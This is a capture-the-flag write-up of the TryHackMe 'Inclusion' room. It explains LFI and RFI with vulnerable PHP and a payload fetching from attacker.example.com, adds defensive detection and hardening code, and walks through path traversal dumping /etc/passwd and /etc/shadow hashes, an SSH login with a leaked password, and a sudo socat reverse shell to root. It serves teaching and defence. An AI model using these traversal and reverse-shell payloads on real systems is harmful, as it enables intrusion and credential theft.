TRYHACKME-INCLUSION ROOM

Intro 

Hacking is identifying weaknesses in computer systems or networks and exploiting them to gain access. An example of hacking is using a password-cracking algorithm to gain access to a system.

Computers have become mandatory for running a successful business. It is not enough to have isolated computer systems; they need to be networked to facilitate communication with external businesses. This exposes them to the outside world and to hacking. Hacking can mean using computers to commit fraudulent acts such as fraud, privacy invasion, stealing corporate or personal data, etc. Cyber crimes cost many organizations millions of dollars every year, so businesses need to protect themselves against such attacks.

In this tutorial, we will learn:

- Common hacking terminologies
- What is Cyber Crime?
- Types of Cyber Crime
- What is Ethical Hacking?
- Why Ethical Hacking?
- Legality of Ethical Hacking
- Summary

Before we go any further, let's look at some of the most commonly used terminologies in the world of hacking.

Who is a Hacker? Types of Hackers

A hacker is a person who finds and exploits weaknesses in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security. Hackers are classified according to the intent of their actions:

- Ethical Hacker (White hat): A hacker who gains access to systems with a view to fixing the identified weaknesses. They may also perform penetration testing and vulnerability assessments.
- Cracker (Black hat): A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts, etc.
- Grey hat: A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identifying weaknesses and revealing them to the system owner.
- Script kiddies: A non-skilled person who gains access to computer systems using ready-made tools.
- Hacktivist: A hacker who uses hacking to send social, religious, political, etc. messages. This is usually done by hijacking websites and leaving the message on the hijacked website.
- Phreaker: A hacker who identifies and exploits weaknesses in telephones instead of computers.

What is Cybercrime?

Cybercrime is the use of computers and networks to perform illegal activities such as spreading computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most cybercrimes are committed through the internet. Some cybercrimes can also be carried out using mobile phones via SMS and online chat applications.

Types of Cybercrime

The following list presents the common types of cybercrime:

- Computer fraud: Intentional deception for personal gain via the use of computer systems.
- Privacy violation: Exposing personal information such as email addresses, phone numbers, account details, etc. on social media, websites, etc.
- Identity theft: Stealing personal information from somebody and impersonating that person.
- Sharing copyrighted files/information: Distributing copyright-protected files such as eBooks and computer programs.
- Electronic funds transfer: Gaining unauthorized access to bank computer networks and making illegal fund transfers.
- Electronic money laundering: Using computers to launder money.
- ATM fraud: Intercepting ATM card details such as account numbers and PINs. These details are then used to withdraw funds from the intercepted accounts.
- Denial of Service attacks: Using computers in multiple locations to attack servers with a view to shutting them down.
- Spam: Sending unauthorized emails. These emails usually contain advertisements.

What is Ethical Hacking?

Ethical hacking is identifying weaknesses in computer systems and/or computer networks and coming up with countermeasures that protect against those weaknesses. Ethical hackers must abide by the following rules:

- Get written permission from the owner of the computer system and/or computer network before hacking.
- Protect the privacy of the organization being hacked.
- Transparently report all identified weaknesses in the computer system to the organization.
- Inform hardware and software vendors of the identified weaknesses.

Why Ethical Hacking?

Information is one of the most valuable assets of an organization. Keeping information secure can protect an organization's image and save it a lot of money. Hacking can lead to loss of business for organizations that deal in finance, such as PayPal. Ethical hacking puts them a step ahead of the cyber criminals who would otherwise cause that loss of business.

Legality of Ethical Hacking

Ethical hacking is legal if the hacker abides by the rules stipulated in the section above on the definition of ethical hacking. The International Council of E-Commerce Consultants (EC-Council) provides a certification program that tests an individual's skills. Those who pass the examination are awarded certificates. The certificates have to be renewed after some time.

Summary

- Hacking is identifying and exploiting weaknesses in computer systems and/or computer networks.
- Cybercrime is committing a crime with the aid of computers and information technology infrastructure.
- Ethical hacking is about improving the security of computer systems and/or computer networks.
- Ethical hacking is legal.

--> Taken from https://www.guru99.com/what-is-hacking-an-introduction.html

LFI

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files, as in the case of RFI).

The following is an example of PHP code that is vulnerable to LFI:

<?php
/**
 * Get the filename from a GET input
 * Example - http://example.com/?file=filename.php
 */
$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - filename.php
 */
include('directory/' . $file);

In the above example, an attacker could make the following request. It tricks the application into executing a PHP script, such as a web shell, that the attacker managed to upload to the web server:

http://example.com/?file=../../uploads/evil.php

In this example, the file uploaded by the attacker will be included and executed as the user that runs the web application. That would allow an attacker to run any server-side malicious code they want. This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file.

Directory Traversal

Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows:

http://example.com/?file=../../../../etc/passwd

In the above example, an attacker can get the contents of the /etc/passwd file, which contains the list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack.

--> Taken from https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/

RFI

Using Remote File Inclusion (RFI), an attacker can cause the web application to include a remote file. This is possible for web applications that dynamically include external files or scripts. Potential consequences of a successful RFI attack range from sensitive information disclosure and Cross-site Scripting (XSS) to Remote Code Execution.

Remote File Inclusion attacks usually occur when an application receives a path to a file as input and does not properly sanitize it. This allows an external URL to be supplied to the include function. The following is an example of PHP code with a Remote File Inclusion vulnerability:

<?php
/**
 * Get the filename from a GET input
 * Example - http://example.com/?file=index.php
 */
$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - index.php
 */
include($file);

Using the above PHP script, an attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example a webshell:

http://example.com/?file=http://attacker.example.com/evil.php

In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server.

--> Taken from https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/
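From the defender's side, both the LFI and RFI sections above come down to one thing: a file-name parameter carrying a traversal sequence, an absolute path, a remote URL or a stream wrapper. The following detector is an added example (not from the Acunetix posts); it runs over constructed Werkzeug-style access-log lines and flags those request shapes, including double-encoded traversal.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Werkzeug-style access-log lines (not captured from the room).
SAMPLE_LOG = """\
10.10.16.8 - - [09/Dec/2020 22:15:01] "GET /article?name=hacking HTTP/1.1" 200 -
10.10.16.8 - - [09/Dec/2020 22:15:09] "GET /article?name=../../../etc/passwd HTTP/1.1" 200 -
10.10.16.8 - - [09/Dec/2020 22:15:22] "GET /article?name=..%252f..%252fetc/shadow HTTP/1.1" 200 -
10.10.16.8 - - [09/Dec/2020 22:15:40] "GET /article?name=http://attacker.example.com/evil.php HTTP/1.1" 500 -
10.10.16.8 - - [09/Dec/2020 22:15:51] "GET /article?name=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 -
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^(?P<scheme>[a-z][a-z0-9+.-]*)://', re.I)
FILE_PARAMS = ("name", "file", "page", "include")   # parameter names worth watching

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so ..%252f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'RFI', 'WRAPPER', 'LFI' or None for one file-parameter value."""
    v = fully_decode(value).replace("\\", "/")
    m = SCHEME_RE.match(v)
    if m:
        return "RFI" if m["scheme"].lower() in ("http", "https", "ftp") else "WRAPPER"
    if v.startswith("/") or ".." in v.split("/"):
        return "LFI"                      # absolute path or traversal segment
    return None

def scan_log(text):
    """Return [(line_no, kind, raw_value)] for every suspicious request in `text`."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param in FILE_PARAMS:
            for value in query.get(param, []):
                kind = classify(value)
                if kind:
                    hits.append((n, kind, value))
    return hits

if __name__ == "__main__":
    for n, kind, value in scan_log(SAMPLE_LOG):
        print(f"line {n}: {kind} attempt via name={value}")
```

The status code is deliberately ignored: a 500 on the RFI line still tells you someone is probing. In PHP, http:// includes only succeed when allow_url_include is enabled (it is off by default), whereas php://filter reads work regardless.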

PRACTICAL

┌─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $nmap -sC -sV -A 10.10.84.203 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 22:10 IST
Nmap scan report for 10.10.84.203
Host is up (0.45s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The nmap scan shows two open ports: SSH on 22 and a Werkzeug (Python) HTTP server on 80. Moving on to the web page, the site offers three articles:

http://10.10.84.203/article?name=hacking

http://10.10.16.8/article?name=rfiattack

http://10.10.16.8/article?name=lfiattack

The page (/article/index.php) is likely including a file whose name is passed in the name parameter, along the lines of the PHP below (nmap reported a Werkzeug/Python server, but the include pattern is the same):

<?php
// Vulnerable pattern: the user-supplied name is included without any validation.
if (isset($_GET['name'])) {
    include($_GET['name']);
}
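Since the target is a Python web application, here is that same include pattern in Python, first the unsafe join and then a hardened resolver that rejects the ../../../etc/passwd traversal, its double-encoded form, and remote URLs. This is an added example, not the room's code; the articles directory layout and the .txt suffix are assumptions.

```python
import os
import tempfile
from urllib.parse import unquote

def unsafe_article_path(articles_dir, name):
    """The pattern in the snippet above: user input joined straight into a path."""
    return os.path.join(articles_dir, name)

def safe_article_path(articles_dir, name):
    """Resolve `name` to a file inside articles_dir, or return None.

    Rejects URL schemes (RFI), traversal and absolute paths (LFI) and any name
    outside a strict allowlist, whatever encoding the input arrives in.
    In a Flask view: abort(404) when this returns None, else send_file(path).
    """
    for _ in range(3):                      # peel nested percent-encoding (..%252f)
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "://" in name or name.startswith(("/", "\\")):
        return None
    if not name or not all(c.isalnum() or c in "-_" for c in name):
        return None                         # allowlist: [A-Za-z0-9_-] only
    base = os.path.realpath(articles_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".txt"))
    if os.path.commonpath([base, candidate]) != base:
        return None                         # defence in depth: stay under base
    return candidate if os.path.isfile(candidate) else None

def demo():
    """Build a throwaway articles directory and try the writeup's own payload."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "hacking.txt"), "w") as f:
            f.write("constructed article body")
        base = os.path.realpath(d)
        traversal = "../../../etc/passwd"
        leaked = os.path.realpath(unsafe_article_path(d, traversal))
        return {
            "unsafe_escapes_dir": os.path.commonpath([base, leaked]) != base,
            "safe_rejects_traversal": safe_article_path(d, traversal) is None,
            "safe_rejects_encoded": safe_article_path(d, "..%252f..%252fetc%2fpasswd") is None,
            "safe_rejects_url": safe_article_path(d, "http://attacker.example.com/evil.php") is None,
            "safe_serves_article": safe_article_path(d, "hacking") is not None,
        }

if __name__ == "__main__":
    print(demo())
```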

http://10.10.84.203/article?name=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

Notice that one of the entries in /etc/passwd is a comment line containing both a login and a password (#falconfeast:rootpassword). The same traversal also returns /etc/shadow, a file normally readable only by root (or the shadow group), which suggests the web application itself runs with elevated privileges:

http://10.10.84.203/article?name=../../../../etc/shadow

root:$6$mFbzBSI/$c80cICObesNyF9XxbF6h6p6U2682MfG5gxJ5KtSLrGI8766/etwzBvppTuug6aLoltiSmeqdIaEUg6f/NLYDn0:18283:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:18281:0:99999:7:::
uuidd:*:18281:0:99999:7:::
dnsmasq:*:18281:0:99999:7:::
landscape:*:18281:0:99999:7:::
pollinate:*:18281:0:99999:7:::
falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/:18281:0:99999:7:::
sshd:*:18281:0:99999:7:::
mysql:!:18281:0:99999:7:::


The comment gives us SSH credentials, so we connect with ssh:

falconfeast:rootpassword


┌─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $ssh falconfeast@10.10.84.203
The authenticity of host '10.10.84.203 (10.10.84.203)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.84.203' (ECDSA) to the list of known hosts.
falconfeast@10.10.84.203's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Dec  9 22:19:46 IST 2020

  System load:  0.0               Processes:           84
  Usage of /:   34.8% of 9.78GB   Users logged in:     0
  Memory usage: 65%               IP address for eth0: 10.10.84.203
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.


Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$ ls -la
total 36
drwxr-xr-x 5 falconfeast falconfeast 4096 Jan 22  2020 .
drwxr-xr-x 3 root        root        4096 Jan 20  2020 ..
drwxr-xr-x 2 root        root        4096 Jan 21  2020 articles
lrwxrwxrwx 1 root        root           9 Jan 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 falconfeast falconfeast  220 Jan 20  2020 .bash_logout
-rw-r--r-- 1 falconfeast falconfeast 3771 Jan 20  2020 .bashrc
drwx------ 2 falconfeast falconfeast 4096 Jan 20  2020 .cache
drwx------ 3 falconfeast falconfeast 4096 Jan 20  2020 .gnupg
-rw-r--r-- 1 falconfeast falconfeast  807 Jan 20  2020 .profile
-rw-r--r-- 1 falconfeast falconfeast    0 Jan 21  2020 .sudo_as_admin_successful
-rw-r--r-- 1 falconfeast falconfeast   21 Jan 22  2020 user.txt
falconfeast@inclusion:~$ cat user.txt
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
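A sudo rule like the one above is exactly what a host audit should catch before an attacker does. The script below is an added defender-side check (not from the room or GTFOBins): it parses the sudo -l output shown above and flags entries that run a shell-capable binary as root, noting whether a password is required. The SHELL_CAPABLE set is a hand-picked subset of binaries with a GTFOBins shell recipe and is an assumption, not an exhaustive list.

```python
import os
import re
import shlex

# The `sudo -l` output captured in the writeup above, reused here as sample input.
SUDO_L_OUTPUT = """\
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
"""

# Binaries with a GTFOBins shell/reverse-shell recipe (hand-picked subset; assumption).
SHELL_CAPABLE = {"socat", "bash", "sh", "vim", "vi", "python3", "perl", "find", "awk", "less", "nmap"}

# One sudoers entry as printed by `sudo -l`: (runas) [TAG: ...] command[, command...]
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return [(runas, tags, command)] from the 'may run' section of `sudo -l`."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            entries.append((m["runas"].strip(), tags, cmd.strip()))
    return entries

def risky_entries(text):
    """Flag entries that run a shell-capable binary (or ALL) as root."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = "ALL" if cmd == "ALL" else os.path.basename(shlex.split(cmd)[0])
        as_root = runas.split(":")[0].strip() in ("root", "ALL")
        if as_root and (binary == "ALL" or binary in SHELL_CAPABLE):
            findings.append({"command": cmd, "binary": binary,
                             "nopasswd": "NOPASSWD" in tags})
    return findings

if __name__ == "__main__":
    for f in risky_entries(SUDO_L_OUTPUT):
        print(f"root via {f['binary']} ({f['command']}), NOPASSWD={f['nopasswd']}")
```

The fix on the host side is to drop the rule or replace it with a wrapper script that runs socat with fixed, non-interactive arguments; restricting sudo to a specific argument list is not enough when the binary can spawn a shell on its own.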


GTFOBins: reverse shell

GTFOBins lists socat as able to send back a reverse shell to a listening attacker, opening remote network access. Its recipe: run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell, with RHOST=attacker.com and RPORT=12345. Substituting our own listener address and port (10.x.y.z is your tun0 address, and we listen on 9999), the command on the target becomes:

socat tcp-connect:10.x.y.z:9999 exec:/bin/sh,pty,stderr,setsid,sigint,sane

Since sudo lets us run socat as root, first open a new terminal on the attacking machine for the nc listener, then run the socat command on the remote host:

falconfeast@inclusion:~$ sudo socat tcp-connect:10.x.y.z:9999 exec:/bin/sh,pty,stderr,setsid,sigint,sane

┌─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.x.y.z] from (UNKNOWN) [10.10.84.203] 33538
/bin/sh: 0: can't access tty; job control turned off
# id    
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt😁



